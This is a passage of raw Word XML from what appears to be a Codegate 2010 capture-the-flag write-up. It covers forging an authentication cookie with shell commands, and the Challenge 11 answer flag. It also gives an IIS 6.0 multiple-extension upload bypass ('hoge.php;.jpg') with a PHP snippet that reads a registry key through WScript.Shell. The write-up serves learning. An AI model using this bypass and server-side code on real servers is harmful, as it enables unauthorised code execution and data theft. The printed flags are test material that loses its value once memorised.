                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>$echo -e -n "\x78\x40\x5c\x5a\xfd\xe5\x5c\x15\x7f\x0d\x91\xeb\xba\x44\x42\x6e\x64\x22\xd2\x2d\x36\x66\x7d\x68\x70\x3c\x12\x2d\x08\x79\x7d\x54"|base64|crc32</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>1927751658</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>$echo -n 'eEBcWv3lXBV/DZHrukRCbmQi0i02Zn1ocDwSLQh5fVQ=|1927751658'|urlencode</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00C03E31" w:rsidRDefault="008A4C86" w:rsidP="00CC1B76">
                  <w:pPr>
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00C03E31">
                    <w:rPr>
                      <w:rFonts w:ascii="DotumChe" w:eastAsia="DotumChe" w:hAnsi="DotumChe" w:cs="Tahoma"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:lang w:eastAsia="ja-JP"/>
                    </w:rPr>
                    <w:t>eEBcWv3lXBV%2FDZHrukRCbmQi0i02Zn1ocDwSLQh5fVQ%3D%7C3558412865</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00CC1B76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>set cookie below , we can get key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00CC1B76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC1B76">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>web3_auth=eEBcWv3lXBV%2FDZHrukRCbmQi0i02Zn1ocDwSLQh5fVQ%3D%7C3558412865</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC1B76" w:rsidRDefault="00CC1B76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1083" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc257340761"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge11</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:1200  </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Answer:LollerSkaterz_From_RoflCopters_With_Guinness</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidR="00AA5FD6" w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2073" type="#_x0000_t202" style="width:437.4pt;height:41.3pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2073" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>credentials: http://ctf6.codegate.org/31337_/index.html</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="004C534A" w:rsidRDefault="008A4C86" w:rsidP="00B23D12"/>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00B23D12" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:r w:rsidRPr="004C534A">
                    <w:t>* Get a value of HKLM\Software\codegate2010, it's the flag.</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRDefault="00762DA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRDefault="00B23D12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRPr="002A0D27" w:rsidRDefault="00B23D12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">File upload site. It is only jpg extension available. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRPr="002A0D27" w:rsidRDefault="00B23D12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">IIS/6.0 have vulnerability , </w:t>
      </w:r>
      <w:r w:rsidR="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>multiple extension bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRPr="002A0D27" w:rsidRDefault="00B23D12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRPr="002A0D27" w:rsidRDefault="00B23D12" w:rsidP="00B23D12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>Microsoft IIS ASP Multiple Extensions Security Bypass - Advisories - Community</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRPr="002A0D27" w:rsidRDefault="00B23D12" w:rsidP="00B23D12">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>http://secunia.com/advisories/37831/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRPr="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRPr="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">for example </w:t>
      </w:r>
      <w:r w:rsidR="00B23D12" w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>「</w:t>
      </w:r>
      <w:r w:rsidR="00B23D12" w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>malicious.asp;.jpg</w:t>
      </w:r>
      <w:r w:rsidR="00B23D12" w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>」</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">execute as </w:t>
      </w:r>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> asp file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRPr="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>ctf6... site works php.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>we upload that php file name as "</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>hoge.php;.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRDefault="00AA5FD6" w:rsidP="00B23D12">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00AA5FD6">
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_s2072" type="#_x0000_t202" style="width:402.65pt;height:103.4pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line">
            <v:textbox style="mso-next-textbox:#_x0000_s2072" inset="5.85pt,.7pt,5.85pt,.7pt">
              <w:txbxContent>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>&lt;html lang="ja"&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>&lt;body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t xml:space="preserve">&lt;?php </w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>$shell = new COM("WScript.Shell");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>echo $shell-&gt;RegRead("HKLM\Software\codegate2010");</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>?&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>&lt;/body&gt;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="008A4C86" w:rsidRPr="00AF29A5" w:rsidRDefault="008A4C86" w:rsidP="00B23D12">
                  <w:pPr>
                    <w:pStyle w:val="HTML"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r w:rsidRPr="00AF29A5">
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana" w:eastAsia="MS Mincho" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
                      <w:color w:val="000000"/>
                      <w:sz w:val="18"/>
                      <w:szCs w:val="18"/>
                      <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
                      <w:lang w:val="ru-RU"/>
                    </w:rPr>
                    <w:t>&lt;/html&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <w10:wrap type="none"/>
            <w10:anchorlock/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="002A0D27" w:rsidP="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B23D12" w:rsidRDefault="002A0D27" w:rsidP="002A0D27">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>access  http://ctf6.codegate.prg/31337_/upload/</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0D27">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> hoge.php;.jpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve"> , we can get key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00762DA2" w:rsidRPr="002A0D27" w:rsidRDefault="00762DA2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009934CF" w:rsidRDefault="009934CF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008A4C86" w:rsidRDefault="00AA5FD6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="27"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict>
          <v:rect id="_x0000_i1084" style="width:6in;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="gray" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="002A0D27" w:rsidRDefault="008A4C86">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc257340762"/>
      <w:r w:rsidRPr="00280EE9">
        <w:rPr>
          <w:rStyle w:val="challenge0"/>
        </w:rPr>
        <w:t>Challnge12</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00762DA2">
        <w:rPr>
          <w:rFonts w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">Points:300   </w:t>
      </w:r>
      <w:r>
        <w:t>Cleared</w:t>
      </w:r>
      <w:r>
        <w:br/>
